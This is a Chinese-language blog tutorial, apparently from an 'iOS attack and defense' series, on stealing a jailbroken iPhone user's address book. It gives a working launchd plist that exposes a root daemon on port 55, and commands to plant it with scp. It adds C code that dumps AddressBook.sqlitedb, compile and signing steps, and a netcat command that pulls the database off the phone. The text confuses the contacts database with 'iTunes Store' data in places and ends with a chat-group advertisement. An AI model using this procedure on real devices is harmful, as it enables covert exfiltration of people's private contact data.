iOS攻防:如何窃取用户的通讯录信息
2018-06-19 本文已影响250人
暮年古稀ZC
简介
本文章基于念茜的iOS攻防系列。
本文将会讲解如何窃取用户的通讯录信息。
同样在越狱手机环境下。
hack
1. 需要一个plist
需要这样一个plist,它看起来是这样:
blog_iOSiTunesstore1
源文件是这样:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Program</key>
<string>/usr/bin/hack</string>
<key>StandardErrorPath</key>
<string>/dev/null</string>
<key>SessionCreate</key>
<true/>
<key>ProgramArguments</key>
<array>
<string>/usr/bin/hack</string>
</array>
<key>inetdCompatibility</key>
<dict>
<key>Wait</key>
<false/>
</dict>
<key>Sockets</key>
<dict>
<key>Listeners</key>
<dict>
<key>SockServiceName</key>
<string>55</string>
</dict>
</dict>
</dict>
</plist>
SockServiceName指的是通信名称
将plist文件传送到至iPhone/System/Library/LaunchDaemons/ 下
scp /Users/zhoulingyu/Desktop/hack.plist root@192.168.31.152:/System/Library/LaunchDaemons/hack.plist
2. 了解一下OS X的启动原理
- mac固件激活,初始化硬件,加载BootX引导器。
- BootX加载内核与内核扩展(kext)。
- 内核启动launchd进程。
- launchd根据/System/Library/LaunchAgents、/System/Library/LaunchDaemons、/Library/LaunchDaemons、Library/LaunchAgents、~/Library/LaunchAgents里的plist配置,启动服务守护进程
解释一下:
LaunchDaemons是用户未登陆前就启动的服务(守护进程)
LaunchAgents是用户登陆后启动的服务(守护进程)
几个目录下plist文件格式及每个字段的含义:
| KEY | DESCRIPTION | REQUIRED |
|---|---|---|
| Label | The name of the job | yes |
| ProgramArguments | Strings to pass to the program when it is executed | yes |
| UserName | The job will be run as the given user, who may not necessarily be the one who submitted it to launchd. | no |
| inetdCompatibility | Indicates that the daemon expects to be run as if it were launched by inetd | no |
| Program | The path to your executable. This key can save the ProgramArguments key for flags and arguments. | no |
| onDemand | A boolean flag that defines if a job runs continuously or not | no |
| RootDirectory | The job will be?chrooted?into another directory | no |
| ServiceIPC | Whether the daemon can speak IPC to launchd | no |
| WatchPaths | Allows launchd to start a job based on modifications at a file-system path | no |
| QueueDirectories | Similar to WatchPath, a queue will only watch an empty directory for new files | no |
| StartInterval | Used to schedule a job that runs on a repeating schedule. Specified as the number of seconds to wait between runs. | no |
| StartCalendarInterval | Job scheduling. The syntax is similar to cron. | no |
| HardResourceLimits | Controls restriction of the resources consumed by any job | no |
| LowPriorityIO | Tells the kernel that this task is of a low priority when doing file system I/O | no |
| Sockets | An array can be used to specify what socket the daemon will listen on for launch on demand | no |
iOS基本类似,我基本是参照这个来的。
所以上面的plist实际上是要求系统启动一个进程。
一个名为hack的进程,可执行文件的路径是/usr/bin/hack。
3. 编写读取通讯录数据程序
iTunes Store的数据都在/var/mobile/Library/AddressBook/AddressBook.sqlitedb中,只要能能拿出AddressBook.sqlitedb就可以非法拿到用户的数据。
那么现在编写一个程序:
Objective-C
#include <stdio.h>
#include <fcntl.h>
#include <stdlib.h>
#define FILE "/var/mobile/Library/AddressBook/AddressBook.sqlitedb"
int main(){
int fd = open(FILE, O_RDONLY);
char buf[128];
int ret = 0;
if(fd < 0)
return -1;
while (( ret = read(fd, buf, sizeof(buf))) > 0){
write( fileno(stdout), buf, ret);
}
close(fd);
return 0;
}
用同样的方法编译、传输:
xcrun -sdk iphoneos clang -arch armv7 -o hack hack.c
签名:
ldid -S hack
mv hack /usr/bin
4. 抓取 iTunesstore 数据信息
利用netcat,指定之前定义的服务名称,抓取设备 iTunesstore 信息:
nc 192.168.31.152 55 > itunesstored2.sqlitedb
OK,在MAC查看一下内容。
作为一个开发者,有一个学习的氛围跟一个交流圈子特别重要这是一个我的iOS交流群:776598941,不管你是小白还是大牛欢迎入驻 ,分享以下资料哦,只要你加群就免费分享哦!
